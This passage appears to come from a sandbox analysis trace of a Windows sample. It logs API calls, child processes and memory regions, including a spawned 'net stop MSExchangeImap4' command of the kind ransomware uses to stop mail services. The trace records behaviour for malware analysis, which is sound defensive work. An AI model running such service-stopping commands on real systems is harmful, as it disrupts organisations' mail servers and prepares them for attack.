3 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.651] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.651] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.652] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeImap4", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4b8f048*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeImap4", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4b8f094 | out: lpCommandLine="net stop MSExchangeImap4", lpProcessInformation=0x4b8f094*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xef4, dwThreadId=0xeec)) returned 1 [0136.658] CloseHandle (hObject=0xa4) returned 1 [0136.658] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.658] GetEnvironmentStringsW () returned 0x4d19ed0* [0136.658] FreeEnvironmentStringsA (penv="=") returned 1 [0136.658] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0136.778] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4b8f02c | out: lpExitCode=0x4b8f02c*=0x2) returned 1 [0136.778] CloseHandle (hObject=0xa8) returned 1 [0136.778] _vsnwprintf (in: _Buffer=0x4b8f114, _BufferCount=0x13, _Format="%08X", _ArgList=0x4b8f034 | out: _Buffer="00000002") returned 8 [0136.778] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0136.778] GetEnvironmentStringsW () returned 0x4d1b3c0* [0136.778] FreeEnvironmentStringsA (penv="=") returned 1 [0136.778] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.778] GetEnvironmentStringsW () returned 0x4d1b3c0* [0136.778] FreeEnvironmentStringsA (penv="=") returned 1 [0136.779] DeleteProcThreadAttributeList (in: lpAttributeList=0x4b8f0c0 | out: lpAttributeList=0x4b8f0c0) [0136.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.779] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.779] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.779] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.779] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.779] SetConsoleInputExeNameW () returned 0x1 [0136.779] GetConsoleOutputCP () returned 0x1b5 [0136.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.780] exit (_Code=2) Thread: id = 636 os_tid = 0xddc Process: id = "206" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29772000" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "205" os_parent_pid = "0xef8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10280 start_va = 0x7f263000 end_va = 0x7f263fff entry_point = 0x0 region_type = private name = "private_0x000000007f263000" filename = "" Region: id = 10281 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10282 start_va = 0x8eb4d30000 end_va = 0x8eb4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000008eb4d30000" filename = "" Region: id = 10283 start_va = 0x8eb4d50000 end_va = 0x8eb4d63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb4d50000" filename = "" Region: id = 10284 start_va = 0x8eb4d70000 end_va = 0x8eb4daffff entry_point = 0x0 region_type = private name = "private_0x0000008eb4d70000" filename = "" Region: id = 10285 start_va = 0x7df5ff980000 end_va = 0x7ff5ff97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff980000" filename = "" Region: id = 10286 start_va = 0x7ff6c4830000 end_va = 0x7ff6c4852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4830000" filename = "" Region: id = 10287 start_va = 0x7ff6c485c000 end_va = 0x7ff6c485dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c485c000" filename = "" Region: id = 10288 start_va = 0x7ff6c485e000 end_va = 0x7ff6c485efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c485e000" filename = "" Region: id = 10289 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10290 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10291 start_va = 0x8eb4d30000 end_va = 0x8eb4d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb4d30000" filename = "" Region: id = 10292 start_va = 0x8eb4d40000 end_va = 0x8eb4d46fff entry_point = 0x0 region_type = private name = "private_0x0000008eb4d40000" filename = "" Region: id = 10293 start_va = 0x8eb4db0000 end_va = 0x8eb4deffff entry_point = 0x0 region_type = private name = "private_0x0000008eb4db0000" filename = "" Region: id = 10294 start_va = 0x8eb4df0000 end_va = 0x8eb4df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb4df0000" filename = "" Region: id = 10295 start_va = 0x8eb4e00000 end_va = 0x8eb4e06fff entry_point = 0x0 region_type = private name = "private_0x0000008eb4e00000" filename = "" Region: id = 10296 start_va = 0x8eb4e10000 end_va = 0x8eb4e10fff entry_point = 0x0 region_type = private name = "private_0x0000008eb4e10000" filename = "" Region: id = 10297 start_va = 0x8eb4e20000 end_va = 0x8eb4e20fff entry_point = 0x0 region_type = private name = "private_0x0000008eb4e20000" filename = "" Region: id = 10298 start_va = 0x8eb4e30000 end_va = 0x8eb4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000008eb4e30000" filename = "" Region: id = 10299 start_va = 0x8eb4f30000 end_va = 0x8eb4fedfff entry_point = 0x8eb4f30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10300 start_va = 0x8eb5080000 end_va = 0x8eb508ffff entry_point = 0x0 region_type = private name = "private_0x0000008eb5080000" filename = "" Region: id = 10301 start_va = 0x8eb5090000 end_va = 0x8eb5217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb5090000" filename = "" Region: id = 10302 start_va = 0x8eb5220000 end_va = 0x8eb53a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb5220000" filename = "" Region: id = 10303 start_va = 0x8eb53b0000 end_va = 0x8eb67affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008eb53b0000" filename = "" Region: id = 10304 start_va = 0x7ff6c4730000 end_va = 0x7ff6c482ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4730000" filename = "" Region: id = 10305 start_va = 0x7ff6c485a000 end_va = 0x7ff6c485bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c485a000" filename = "" Region: id = 10306 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10307 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10308 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10309 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10310 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10311 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10312 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10313 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10314 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10315 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10316 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10317 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10318 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10319 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 632 os_tid = 0xf4c Thread: id = 633 os_tid = 0xf2c Thread: id = 635 os_tid = 0xf50 Process: id = "207" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x11daf000" os_pid = "0xef4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "205" os_parent_pid = "0xef8" cmd_line = "net stop MSExchangeImap4" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10333 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10334 start_va = 0xf20000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 10335 start_va = 0x4f20000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 10336 start_va = 0x4f40000 end_va = 0x4f41fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 10337 start_va = 0x4f50000 end_va = 0x4f63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 10338 start_va = 0x4f70000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 10339 start_va = 0x4fb0000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 10340 start_va = 0x5030000 end_va = 0x5033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005030000" filename = "" Region: id = 10341 start_va = 0x5040000 end_va = 0x5040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005040000" filename = "" Region: id = 10342 start_va = 0x5050000 end_va = 0x5051fff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 10343 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10344 start_va = 0x7edd0000 end_va = 0x7edf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edd0000" filename = "" Region: id = 10345 start_va = 0x7edf3000 end_va = 0x7edf3fff entry_point = 0x0 region_type = private name = "private_0x000000007edf3000" filename = "" Region: id = 10346 start_va = 0x7edf5000 end_va = 0x7edf5fff entry_point = 0x0 region_type = private name = "private_0x000000007edf5000" filename = "" Region: id = 10347 start_va = 0x7edfd000 end_va = 0x7edfffff entry_point = 0x0 region_type = private name = "private_0x000000007edfd000" filename = "" Region: id = 10348 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10349 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10350 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10351 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10352 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10353 start_va = 0x5220000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 10354 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10355 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10356 start_va = 0x50b0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 10357 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 637 os_tid = 0xeec Thread: id = 638 os_tid = 0xf34 Process: id = "208" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x12091000" os_pid = "0xf24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "207" os_parent_pid = "0xef4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeImap4" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10358 start_va = 0x420000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10359 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 10360 start_va = 0x450000 end_va = 0x463fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 10361 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 10362 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 10363 start_va = 0x530000 end_va = 0x533fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10364 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 10365 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 10366 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10367 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10368 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10369 start_va = 0x7eaa0000 end_va = 0x7eac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaa0000" filename = "" Region: id = 10370 start_va = 0x7eac7000 end_va = 0x7eac7fff entry_point = 0x0 region_type = private name = "private_0x000000007eac7000" filename = "" Region: id = 10371 start_va = 0x7eacc000 end_va = 0x7eaccfff entry_point = 0x0 region_type = private name = "private_0x000000007eacc000" filename = "" Region: id = 10372 start_va = 0x7eacd000 end_va = 0x7eacffff entry_point = 0x0 region_type = private name = "private_0x000000007eacd000" filename = "" Region: id = 10373 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10374 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10375 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10376 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10377 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10378 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 10379 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10380 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10381 start_va = 0x6e0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 10382 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10383 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 10384 start_va = 0x430000 end_va = 0x433fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 10385 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 10386 start_va = 0x5e0000 end_va = 0x69dfff entry_point = 0x5e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10387 start_va = 0x7e0000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 10388 start_va = 0x8f0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 10389 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10390 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10391 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10392 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10393 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10394 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10395 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10396 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10397 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10398 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10399 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10400 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10401 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10402 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = 